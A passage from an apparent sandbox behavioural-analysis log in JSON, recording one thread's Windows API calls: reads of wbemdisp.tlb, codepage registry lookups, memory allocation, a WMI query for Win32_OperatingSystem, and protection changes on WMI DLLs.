              {
                "name": "FileInformation",
                "value": "\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 766
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": "PE\\x00\\x00"
              },
              {
                "name": "Length",
                "value": "24"
              }
            ],
            "repeated": 0,
            "id": 767
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 768
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xb0\\x01\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 769
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": ".rdata\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00@"
              },
              {
                "name": "Length",
                "value": "40"
              }
            ],
            "repeated": 0,
            "id": 770
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000364"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\Codepage"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Codepage"
              }
            ],
            "repeated": 0,
            "id": 771
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000364"
              },
              {
                "name": "ValueName",
                "value": "1252"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "c_1252.nls"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\1252"
              }
            ],
            "repeated": 0,
            "id": 772
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\C_1252.NLS"
              }
            ],
            "repeated": 0,
            "id": 773
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": ".rsrc\\x00\\x00\\x00\\x00\\xe5\\x00\\x00\\x00 \\x00\\x00\\x00\\xe6\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00@"
              },
              {
                "name": "Length",
                "value": "40"
              }
            ],
            "repeated": 0,
            "id": 774
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 775
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 776
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00"
              },
              {
                "name": "Length",
                "value": "24"
              }
            ],
            "repeated": 0,
            "id": 777
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 778
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xa0\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 779
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x07\\x00"
              },
              {
                "name": "Length",
                "value": "16"
              }
            ],
            "repeated": 0,
            "id": 780
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 781
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 2,
            "id": 782
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": " \\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 783
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00"
              },
              {
                "name": "Length",
                "value": "16"
              }
            ],
            "repeated": 0,
            "id": 784
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "0\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 785
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x01\\x00\\x00\\x00P\\x00\\x00\\x80"
              },
              {
                "name": "Length",
                "value": "8"
              }
            ],
            "repeated": 0,
            "id": 786
          },
          {
            "timestamp": "2025-11-20 10:58:29,766",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 2,
            "id": 787
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "P\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 788
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00"
              },
              {
                "name": "Length",
                "value": "24"
              }
            ],
            "repeated": 0,
            "id": 789
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 790
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x80\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 791
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": "h$\\x00\\x00\\x98\\xe0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "Length",
                "value": "16"
              }
            ],
            "repeated": 0,
            "id": 792
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "5",
                "pretty_value": "FileStandardInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00p\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xea\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 793
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000368"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              }
            ],
            "repeated": 0,
            "id": 794
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "misc",
            "api": "GetSystemInfo",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 795
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000368"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02d90000"
              },
              {
                "name": "SectionOffset",
                "value": "0x007f9670"
              },
              {
                "name": "ViewSize",
                "value": "0x0000f000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 796
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0094e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 797
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0094f000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 798
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00951000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 799
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00953000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 800
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00954000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 801
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00955000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 802
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00957000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 803
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00958000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 804
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00959000"
              },
              {
                "name": "RegionSize",
                "value": "0x00004000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 805
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "en-US"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en-US"
              }
            ],
            "repeated": 0,
            "id": 806
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "en"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en"
              }
            ],
            "repeated": 0,
            "id": 807
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "WMI_ExecQuery",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Query",
                "value": "Select * from Win32_OperatingSystem"
              }
            ],
            "repeated": 0,
            "id": 808
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed40c8000"
              },
              {
                "name": "ModuleName",
                "value": "fastprox.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 809
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed40c8000"
              },
              {
                "name": "ModuleName",
                "value": "fastprox.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 810
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed9501000"
              },
              {
                "name": "ModuleName",
                "value": "wbemsvc.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
